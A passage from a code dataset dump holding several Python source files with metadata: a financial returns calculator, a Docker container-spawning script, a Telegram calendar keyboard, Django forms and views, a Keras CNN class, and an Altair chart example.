ITD)\n self.itd_annualized_volatility = self.ts.std() * np.sqrt(self.periodicity)\n self.calendar_year_returns = {\n self.end.year: self.cumulative.loc[self.cumulative.index.max()] / self.cumulative.loc[datetime(self.end.year - 1, 12, 31).isoformat()] - 1,\n self.end.year - 1: self.calculate_calendar_year_return(self.end.year - 1),\n self.end.year - 2: self.calculate_calendar_year_return(self.end.year - 2),\n self.end.year - 3: self.calculate_calendar_year_return(self.end.year - 3),\n self.end.year - 4: self.calculate_calendar_year_return(self.end.year - 4),\n self.end.year - 5: self.calculate_calendar_year_return(self.end.year - 5),\n self.end.year - 6: self.calculate_calendar_year_return(self.end.year - 6),\n self.end.year - 7: self.calculate_calendar_year_return(self.end.year - 7),\n self.end.year - 8: self.calculate_calendar_year_return(self.end.year - 8),\n self.end.year - 9: self.calculate_calendar_year_return(self.end.year - 9),\n self.end.year - 10: self.calculate_calendar_year_return(self.end.year - 10),\n }\n # self.bokeh_ts_level_plot = self.generate_bokeh_ts_level_plot()\n self.bokeh_return_plot = self.generate_bokeh_return_plot()\n\n\n @staticmethod\n def compute_ts_level(foid, start=None, end=None):\n \"\"\"return a time series of levls of ts data (appropriate for graphing economic indicators and growth of a\n dollar return charts \"\"\"\n all_tsi_fo = TSData.query.filter(TSData.foid == foid)\n df = pd.read_sql(all_tsi_fo.statement, all_tsi_fo.session.bind)\n sources = set([source for source in df['source']])\n first = df.dt.min()\n last = df.dt.max()\n df['rank'] = df.apply(lambda x: ts_hierarchy[x['source']], axis=1)\n #df.groupby('dt').filter(lambda x: df['rank'])\n df['best'] = df.groupby('dt')['rank'].transform(lambda x: x.min())\n df = df[\n df['rank'] == df['best']\n ]\n df.set_index('dt', inplace=True)\n if not start:\n start = df.index.min()\n if not end:\n end = df.index.max()\n df.dropna()\n return df['level'][start:end]\n\n @staticmethod\n def compute_ts_returns(foid, freq_code, start=None, end=None):\n \"\"\"\"return a time series of returns, with resampling for periodicity\"\"\"\n all_tsi_fo = TSData.query.filter(TSData.foid == foid)\n df = pd.read_sql(all_tsi_fo.statement, all_tsi_fo.session.bind)\n df['rank'] = df.apply(lambda x: ts_hierarchy[x['source']], axis=1)\n returns = df.pivot(index='dt', columns='rank', values='level').resample(freq_code).ffill() \\\n .pct_change().reset_index().melt(id_vars='dt')\n returns['best'] = df.groupby('dt')['rank'].transform(lambda x: x.min())\n returns = returns[\n returns['rank'] == returns['best']\n ]\n returns.set_index('dt', inplace=True)\n returns.drop(['rank', 'best'], axis=1, inplace=True)\n print(returns.columns)\n returns.columns = ['returns']\n if not start:\n start = returns.index.min()\n if not end:\n end = returns.index.max()\n df.dropna()\n return returns['returns'][start:end]\n\n @staticmethod\n def find_previous_quarter_end(dt: datetime):\n if dt.month < 3:\n return datetime(dt.year - 1, 12, 31)\n elif dt.month < 6:\n return datetime(dt.year, 3, 31)\n elif dt.month < 9:\n return datetime(dt.year, 6, 30)\n else:\n return datetime(dt.year, 9, 30)\n\n @staticmethod\n def find_previous_year_end(dt: datetime):\n return datetime(dt.year - 1, 12, 31)\n\n @staticmethod\n def compute_cumulative_return(ts):\n \"\"\"Makes cumulative return timeseries from returns; expects a NaN at beginning, countermeasures pending\"\"\"\n cumulative = ts.apply(lambda x: x + 1)\n cumulative.iloc[0] = 1\n cumulative = cumulative.cumprod()\n return cumulative\n\n def calculate_annualized_return(self, years:int):\n indexable_denominator = self.end.replace(self.end.year - years, self.end.month, monthrange(self.end.year - years, self.end.month)[1]).date().isoformat()\n ret = self.cumulative[self.end.date().isoformat()] / self.cumulative[indexable_denominator]\n return ret ** (365 / (365 * years)) - 1\n\n def calculate_calendar_year_return(self, year: int):\n return self.cumulative.loc[datetime(year, 12, 31).date().isoformat()] / \\\n self.cumulative.loc[datetime(year - 1, 12, 31).date().isoformat()] - 1\n\n def generate_bokeh_ts_level_plot(self):\n p = figure(x_axis_type=\"datetime\")\n p.line(self.level.index.values, self.level.values)\n\n def generate_bokeh_return_plot(self):\n p = figure(x_axis_type=\"datetime\")\n p.line(self.cumulative.index.values, self.cumulative.values)\n p.extra_y_ranges = {\"returns\": Range1d()}\n p.add_layout(LinearAxis(y_range_name=\"returns\", ), \"right\")\n p.vbar(x=self.ts.dropna().index.values, top=self.ts.dropna().values, width=1, y_range_name=\"returns\")\n return json.dumps(p, target=self.div_id_target)\n\n\nclass TSCalcSchema(ma.Schema):\n \"\"\"Serialize calculations for a time series\"\"\"\n class Meta:\n fields = (\"foid\", \"mtd_return\", \"qtd_return\", \"ytd_return\", \"one_year_return\", \"two_year_return\", \"three_year_return\", \\\n \"four_year_return\", \"five_year_return\", \"calendar_year_returns\", \"itd_annualized_return\", \"itd_annualized_volatility\")\n", "sub_path": "app/quant.py", "file_name": "quant.py", "file_ext": "py", "file_size_in_byte": 8178, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "config.basedir", "line_number": 16, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 25, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "attribute"}, {"api_name": "numpy.product", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 56, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "call"}, {"api_name": "app.models.TSData.query.filter", "line_number": 78, "usage_type": "call"}, {"api_name": "app.models.TSData.query", "line_number": 78, "usage_type": "attribute"}, {"api_name": "app.models.TSData", "line_number": 78, "usage_type": "name"}, {"api_name": "app.models.TSData.foid", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 79, "usage_type": "call"}, {"api_name": "app.models.TSData.query.filter", "line_number": 100, "usage_type": "call"}, {"api_name": "app.models.TSData.query", "line_number": 100, "usage_type": "attribute"}, {"api_name": "app.models.TSData", "line_number": 100, "usage_type": "name"}, {"api_name": "app.models.TSData.foid", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pandas.read_sql", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 121, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 123, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 125, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 127, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 133, "usage_type": "call"}, {"api_name": "calendar.monthrange", "line_number": 144, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 153, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 157, "usage_type": "call"}, {"api_name": "bokeh.models.Range1d", "line_number": 159, "usage_type": "call"}, {"api_name": "bokeh.models.LinearAxis", "line_number": 160, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 162, "usage_type": "call"}, {"api_name": "marshmallow.Schema", "line_number": 165, "usage_type": "attribute"}]}
+{"seq_id": "38610394", "text": "#!/usr/bin/python\nimport argparse\nimport os\nfrom multiprocessing import Queue, Pool\nimport multiprocessing\nimport time\ndef execute_command (cmd):\n\n output = os.popen(cmd).read()\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Create or delete VCH.')\n parser.add_argument(\"-c\", \"--vchCount\", help= \"number of VCH\", required=True)\n parser.add_argument(\"-s\", \"--startIp\", help= \"Starting IP of VCH\", required=True)\n parser.add_argument(\"-x\", \"--cCount\", help= \"number of containers\", required=True)\n\n args = vars ( parser.parse_args())\n\n\n startIp = args['startIp']\n vchCount = int(args['vchCount'])\n contCount = int(args['cCount'])\n octets = startIp.split('.')\n\n lastOctet = int(octets[3])\n print(lastOctet)\n dockerRunCommands = []\n\n for i in range (lastOctet, lastOctet + vchCount + 1):\n #p = multiprocessing.Pool(contCount + 1)\n #dockerRunCommands = []\n for k in range (contCount):\n dockerRunCommands.append(\"docker -H \" + '.'.join(octets[0:3]) + '.' + str(i) + \":2376 --tls run -itd --label app.name=photon photon\")\n #p.map(execute_command, dockerRunCommands)\n #p.close()\n #p.join()\n #print(dockerRunCommands)\n\n p = multiprocessing.Pool(50)\n p.map(execute_command, dockerRunCommands)\n p.close()\n p.join()\n\n\nif __name__==\"__main__\":\n main()\n", "sub_path": "VicOnJenkins/NSXV/spawnContainers.py", "file_name": "spawnContainers.py", "file_ext": "py", "file_size_in_byte": 1368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.popen", "line_number": 9, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 40, "usage_type": "call"}]}
+{"seq_id": "344079073", "text": "import calendar\nfrom aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\nfrom aiogram.utils.callback_data import CallbackData\nfrom aiogram.utils.callback_data import CallbackData\n\ncalendar_cb = CallbackData('day_cb', 'day', 'month', 'year', 'action')\n\ndef generate_calendar(year: int, month: int):\n if month < 1 or month > 12:\n return []\n markup = InlineKeyboardMarkup()\n \n for week in calendar.monthcalendar(year, month):\n markup.row(*[InlineKeyboardButton(day if day!=0 else '⚪️', callback_data=calendar_cb.new(day = day, month=month, year=year, action = \"select_day\")) for day in week])\n \n l = []\n if month == 1:\n l.append(InlineKeyboardButton(\"Back\", callback_data=calendar_cb.new(day = 0, month = 12, year = year - 1, action = \"change\")))\n else:\n l.append(InlineKeyboardButton(\"Back\", callback_data=calendar_cb.new(day = 0, month = month - 1, year = year, action = \"change\")))\n if month == 12:\n l.append(InlineKeyboardButton(\"Next\", callback_data=calendar_cb.new(day = 0, month = 1, year = year+1, action = \"change\")))\n else:\n l.append(InlineKeyboardButton(\"Next\", callback_data=calendar_cb.new(day = 0, month = month + 1, year = year, action = \"change\")))\n markup.row(*l)\n return markup", "sub_path": "plugins/broadcasting/calendar_keyboard.py", "file_name": "calendar_keyboard.py", "file_ext": "py", "file_size_in_byte": 1286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "aiogram.utils.callback_data.CallbackData", "line_number": 6, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardMarkup", "line_number": 11, "usage_type": "call"}, {"api_name": "calendar.monthcalendar", "line_number": 13, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 14, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 18, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 20, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 22, "usage_type": "call"}, {"api_name": "aiogram.types.InlineKeyboardButton", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "227919633", "text": "import pandas as pd\nimport dask.dataframe as dd\nimport numpy as np\nfrom monitoring.time_it import timing\n\n\n#function takes Dask Dataframe as input and removes Features with correlation >= correlation_coefficient\n@timing\ndef remove_correlated_features(df, correlation_coefficient=1, dask=True):\n #reduce dataframe by not consider global timestamp and errorCodes\n df_reduced = df.select_dtypes(include='number')\n drop_errorcode_col = [col for col in df_reduced.columns if 'errorCode' in col]\n df_reduced = df_reduced.drop(columns=drop_errorcode_col)\n\n #create correlation matrix and determine columns to drop\n corr_matrix = df_reduced.corr().abs()\n if dask:\n corr_matrix = corr_matrix.compute()\n\n upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool))\n to_drop = [column for column in upper.columns if any(upper[column] >= correlation_coefficient)]\n print('Number of columns to drop: ' + str(len(to_drop)))\n\n df = df.drop(columns=to_drop)\n return df", "sub_path": "code/data_cleansing/remove_correlated_features.py", "file_name": "remove_correlated_features.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dask.dataframe", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.triu", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 20, "usage_type": "attribute"}, {"api_name": "monitoring.time_it.timing", "line_number": 8, "usage_type": "name"}]}
+{"seq_id": "372381297", "text": "from django import forms\nfrom .models import *\nfrom django.core.exceptions import ValidationError\n\ndef weight_validate(value):\n\tif not str(value).isdigit():\n\t\traise ValidationError('请输入正确的重量')\n'''\nclass ProductForm(forms.Form):\n\n\tname = forms.CharField(max_length=20, label='名字', widget=forms.widgets.TextInput(attrs={'class':'c1'}), \n\t\terror_messages={'required':'名字不能为空'},)\n\tweight = forms.CharField(max_length=50, label='重量', validators = [weight_validate])\n\tsize = forms.CharField(max_length=20, label='尺寸')\n\tchoice_list = [(i+1, v['type_name']) for i, v in enumerate(Type.objects.values('type_name'))]\n\ttype = forms.ChoiceField(label='产品类型', choices = choice_list, widget = forms.widgets.Select(attrs = {'class':'type', 'size':'4'}))\n'''\nclass ProductModelForm(forms.ModelForm):\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(ProductModelForm, self).__init__(*args, **kwargs)\n\t\tchoices_list = [(i+1, v['type_name']) for i, v in enumerate(Type.objects.values('type_name'))]\n\t\tself.fields['type'].choices = choices_list\n\t\tself.fields['name'].initial = '我的手机'\n\n\tproductId = forms.CharField(max_length=20, label = '产品序号')\n\n\tclass Meta:\n\t\tmodel = Product\n\t\t#choice_list = [(i+1, v['type_name']) for i, v in enumerate(Type.objects.values('type_name'))]\n\n\t\tfields = ['name','weight','size','type']\n\t\texclude = []\n\t\tlabels = {\n\t\t\t'name':'产品名称',\n\t\t\t'weight':'重量',\n\t\t\t'size':'尺寸',\n\t\t\t'type':'产品类型'\n\t\t\t\t\t}\n\t\twidgets = {\n\t\t\t'name':forms.widgets.TextInput(attrs={'class':'c1'}),\n\t\t}\n\t\tfield_classes = {\n\t\t\t'name':forms.CharField,\n\t\t\t#'type':forms.ChoiceField(choices = choice_list)\n\t\t}\n\t\thelp_text = {\n\t\t\t'name':''\n\t\t}\n\n\t\terror_messages = {\n\t\t\t'__all__':{'required':'请输入内容',\n\t\t\t\t\t\t'invalid':'请检查输入内容'},\n\t\t\t'weight':{'required':'请输入内容',\n\t\t\t\t\t\t'invalid':'请检查输入内容'}\n\t\t}\n\n\tdef clean_weight(self):\n\t\tdata = self.cleaned_data['weight']\n\t\treturn data+'g'\n", "sub_path": "formthef/formthis/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1976, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.core.exceptions.ValidationError", "line_number": 7, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 26, "usage_type": "name"}, {"api_name": "django.forms.widgets.TextInput", "line_number": 41, "usage_type": "call"}, {"api_name": "django.forms.widgets", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 41, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 44, "usage_type": "name"}]}
+{"seq_id": "234552367", "text": "\"\"\"\n A python class to create the convolutional neural network\n which will be used to establish what type of box is being.\n This class inherit from the keras.Sequential model and also has functions which process and regularize the images\n@author Ian Gomez imgomez0127@github\n\"\"\"\nfrom functools import reduce\nfrom math import ceil\nimport os\nimport time\nimport numpy as np\nimport pandas\nfrom PIL import Image\nfrom tensorflow import keras,convert_to_tensor,split,map_fn,stack\nfrom tensorflow import shape as tfshape\nfrom tensorflow.data import Dataset\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten,Reshape,BatchNormalization,Input\nfrom sklearn.utils import shuffle\nfrom ImageProcessor import ImageProcessor \nfrom ImageScraper import ImageScraper\n\nclass ConvNet(keras.Sequential):\n def __init__(self, boxname, convLayerAmt, denseLayersAmt,modelDir=\"models/\"):\n super().__init__()\n self._boxname = boxname\n self._convLayerAmt = convLayerAmt \n self._denseLayersAmt = denseLayersAmt\n self._filePath = \"./\" + self._boxname + \"Examples\" \n self._imageLabels = self._classifyImages()\n self._images = self._processImages() \n self._imageShape = self._images[0].shape\n self._kernelSize = 3\n self._kernelChannels = 3\n self._poolingSize = 2\n if(not os.path.isdir(modelDir)):\n raise OSError(\"The input directory \" + str(newDir) +\" directory does not exist\")\n self._modelDir = modelDir\n\n @property\n def boxname(self):\n #Name of the box which the ConvNet will predict for\n return self._boxname\n \n @property\n def convLayerAmt(self):\n #Amount of Convolution Layers\n return self._convLayerAmt\n\n @convLayerAmt.setter\n def convLayerAmt(self,convLayerAmt):\n if(type(convLayerAmt) != int):\n raise ValueError(\"ConvLayerAmt is not of type int\")\n self._convLayerAmt = convLayerAmt\n \n @property\n def denseLayersAmt(self):\n #Amount of Dense Layers\n return self._denseLayersAmt\n \n @denseLayersAmt.setter\n def denseLayersAmt(self,denseLayersAmt):\n self._denseLayersAmt = denseLayersAmt\n \n @property\n def imageShape(self):\n return self._imageShape\n \n @imageShape.setter\n def imageShape(self,imageShape):\n self._imageShape = imageShape \n\n @property\n def filePath(self):\n #File path for the images\n return self._filePath\n \n @property\n def images(self):\n #A numpy array of images\n return self._images \n\n @property\n def kernelSize(self):\n #Size of the convolutional kernel\n return self._kernelSize\n \n @kernelSize.setter\n def kernelSize(self,kernelSize):\n if(type(kernelSize) != int):\n raise ValueError(\"The input kernelSize is not an int\") \n self._kernelSize == kernelSize\n \n @property\n def kernelChannels(self):\n #The amount of kernels that will be run over the image per convolutional layer\n return self._kernelChannels\n \n @kernelChannels.setter\n def kernelChannels(self,kernelChannels):\n if(type(kernelChannels) != int):\n raise ValueError(\"The inputted kernelChannels is not of type int\")\n self._kernelChannels = kernelChannels\n\n @property\n def poolingSize(self):\n return self._poolingSize\n \n @poolingSize.setter\n def poolingSize(self,poolingSize):\n if(type(poolingSize) != int):\n raise ValueError(\"The inputted poolingSize is not of type int\")\n self._poolingSize = poolingSize\n\n @property\n def imageLabels(self):\n return self._imageLabels\n\n @property\n def modelDir(self):\n #Directory for the model\n return self._modelDir\n\n @modelDir.setter\n def modelDir(self,newDir):\n if(not os.path.isdir(newDir)):\n raise OSError(\"The input directory \" + str(newDir) +\n \" directory does not exist\")\n self._modelDir = newDir\n\n @property\n def modelPath(self):\n #Path of the model h5 file\n return self.modelDir+self.boxname+\".h5\" \n\n def _processImages(self):\n \"\"\"\n Returns:\n processedImages(np.array[float64]): Array of images represented as matrices\n This function processes and returns the images in the folder \n that holds the examples for the box specified by self._boxname\n \"\"\"\n processor = ImageProcessor(self._filePath) \n processedImages = processor.processFolderImages()\n if(len(processedImages) == 0):\n raise ValueError(\"There are no images in that folder\")\n return processedImages \n\n def _classifyImages(self):\n \"\"\"\n This function classifies the images in the folder that \n holds the examples for the box specifed by self._boxname\n \"\"\"\n processor = ImageProcessor(self._filePath)\n labels = processor.classifyImages()\n if(len(labels) == 0):\n raise ValueError(\"There are no images in that folder\")\n return labels\n\n def BuildConvNet(self):\n self.add(Input(shape=self._imageShape))\n for i in range(self._convLayerAmt):\n self.add(Conv2D(self._kernelChannels,self._kernelSize,\n padding=\"Valid\"))\n self.add(MaxPooling2D(self._poolingSize))\n self.add(Flatten())\n for i in range(self._denseLayersAmt):\n self.add(Dense(100,activation = \"relu\",use_bias=True))\n self.add(Dense(1,activation=\"sigmoid\"))\n return self.layers\n \n def save(self):\n super().save(self.modelPath)\n\n def grabRegionAsTensor(self,OS): \n scraper = ImageScraper(self._boxname,OS)\n return ImageProcessor.toImageTensor(scraper.grabScreenRegion())\n\n def load_weights(self):\n if(not os.path.exists(self.modelPath)):\n raise OSError(\"The model does not exist\") \n super().load_weights(self.modelPath)\n \n def regularizeImages(self,images):\n return images/255\n\n def train(self):\n trainingImages = np.asarray(self.regularizeImages(self._images))\n trainingLabels = np.asarray(self._imageLabels)\n imageBatches = np.array_split(trainingImages,ceil(trainingImages.shape[0]/10))\n labelBatches = np.array_split(trainingLabels,ceil(trainingLabels.shape[0]/10))\n self.compile(\n optimizer = keras.optimizers.Adam(lr=.001),\n loss=\"binary_crossentropy\",metrics=[\"accuracy\"])\n for images,labels in list(zip(imageBatches,labelBatches)):\n self.fit(\n images,\n labels,\n epochs=100,\n batch_size=trainingLabels.shape[0],\n validation_split=0.2)\n \nif __name__ == \"__main__\": \n testModel = ConvNet(\"autobox\",3,6)\n testModel.BuildConvNet()\n testModel.train()\n testModel.save()\n predictions = testModel.predict(testModel.images)\n print(predictions)\n print(reduce(lambda x,y: x and y,[round(x[0]) for x in predictions] == np.asarray(testModel.imageLabels)))\n print(testModel.imageLabels)\n testModel.summary()\n", "sub_path": "ConvNet.py", "file_name": "ConvNet.py", "file_ext": "py", "file_size_in_byte": 7248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "tensorflow.keras.Sequential", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "ImageProcessor.ImageProcessor", "line_number": 142, "usage_type": "call"}, {"api_name": "ImageProcessor.ImageProcessor", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Input", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 162, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 164, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 168, "usage_type": "call"}, {"api_name": "ImageScraper.ImageScraper", "line_number": 175, "usage_type": "call"}, {"api_name": "ImageProcessor.ImageProcessor.toImageTensor", "line_number": 176, "usage_type": "call"}, {"api_name": "ImageProcessor.ImageProcessor", "line_number": 176, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 189, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.array_split", "line_number": 190, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 190, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 192, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 192, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 192, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}]}
+{"seq_id": "355728856", "text": "from django import forms\nfrom .models import Stock\n\nclass StockCreateForm(forms.ModelForm):\n class Meta:\n model = Stock\n fields = ['category', 'item_name', 'quantity','location']\n def clean_category(self):\n category=self.cleaned_data.get('category')\n if not category:\n raise forms.ValidationError('this field is required')\n\n #for instance in Stock.objects.all():\n # if instance.category == category:\n # raise forms.ValidationError(str(category) + ' is already created')\n\t\t\n return category\n\n def clean_item_name(self):\n item_name=self.cleaned_data.get('item_name')\n if not item_name:\n raise forms.ValidationError('this field is required')\n\n return item_name\n\n def clean_location(self):\n location=self.cleaned_data.get('location')\n if not location:\n raise forms.ValidationError('This field is required')\n return location\n\nclass StockSearchForm(forms.ModelForm):\n class Meta:\n model = Stock\n fields = ['category', 'item_name']\n\nclass StockUpdateForm(forms.ModelForm):\n class Meta:\n model=Stock\n fields=['category','item_name','quantity','location']\n\n \n\n\n", "sub_path": "inventory/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "models.Stock", "line_number": 6, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 22, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}, {"api_name": "models.Stock", "line_number": 34, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Stock", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "477548011", "text": "from django.shortcuts import render , redirect\nfrom ..forms import candidateRegForm , EditProfileForm , EditCandidateProfile\nfrom ..models import User , Candidate\nfrom django.views.generic import CreateView , UpdateView\n\n# from django.contrib.auth import authenticate , login , logout\n\n\nclass candidateReg(CreateView):\n model = User\n form_class = candidateRegForm\n template_name = 'candidateReg.html'\n\n def get_context_data(self , **kwargs):\n kwargs['user_type'] = 'candidate'\n return super().get_context_data(**kwargs)\n \n def form_valid(self , form):\n user = form.save()\n return redirect('account:login') \n # return redirect('account:home')\n\n\ndef candidateUpdate(request):\n if request.method == 'POST':\n u_form = EditProfileForm(request.POST , instance = request.user)\n c_form = EditCandidateProfile(request.POST, instance = request.user.candidate)\n if u_form.is_valid() and c_form.is_valid():\n u_form.save()\n c_form.save()\n return redirect('account:candidate_dash')\n else:\n u_form = EditProfileForm(instance = request.user)\n c_form = EditCandidateProfile(instance = request.user.candidate)\n \n context = {\n 'u_form' : u_form,\n 'c_form' : c_form\n }\n \n return render(request , 'userUpdateProfile.html' , context)\n\n", "sub_path": "NewIntense/account/views/candidateViwe.py", "file_name": "candidateViwe.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.views.generic.CreateView", "line_number": 9, "usage_type": "name"}, {"api_name": "models.User", "line_number": 10, "usage_type": "name"}, {"api_name": "forms.candidateRegForm", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 20, "usage_type": "call"}, {"api_name": "forms.EditProfileForm", "line_number": 26, "usage_type": "call"}, {"api_name": "forms.EditCandidateProfile", "line_number": 27, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "forms.EditProfileForm", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.EditCandidateProfile", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "510108691", "text": "\"\"\"\nMulti-Line Highlight\n====================\nThis multi-line chart uses an invisible Voronoi tessellation to handle mouseover to\nidentify the nearest point and then highlight the line on which the point falls.\nIt is adapted from the Vega-Lite example found at\nhttps://bl.ocks.org/amitkaps/fe4238e716db53930b2f1a70d3401701\n\"\"\"\n# category: interactive charts\nimport altair as alt\nfrom vega_datasets import data\n\nsource = data.stocks()\n\nhighlight = alt.selection_point(on='mouseover',\n fields=['symbol'], nearest=True)\n\nbase = alt.Chart(source).encode(\n x='date:T',\n y='price:Q',\n color='symbol:N'\n)\n\npoints = base.mark_circle().encode(\n opacity=alt.value(0)\n).add_params(\n highlight\n).properties(\n width=600\n)\n\nlines = base.mark_line().encode(\n size=alt.condition(~highlight, alt.value(1), alt.value(3))\n)\n\npoints + lines\n", "sub_path": "tests/examples_arguments_syntax/multiline_highlight.py", "file_name": "multiline_highlight.py", "file_ext": "py", "file_size_in_byte": 867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "vega_datasets.data.stocks", "line_number": 13, "usage_type": "call"}, {"api_name": "vega_datasets.data", "line_number": 13, "usage_type": "name"}, {"api_name": "altair.selection_point", "line_number": 15, "usage_type": "call"}, {"api_name": "altair.Chart", "line_number": 18, "usage_type": "call"}, {"api_name": "altair.value", "line_number": 25, "usage_type": "call"}, {"api_name": "altair.condition", "line_number": 33, "usage_type": "call"}, {"api_name": "altair.value", "line_number": 33, "usage_type": "call"}]}
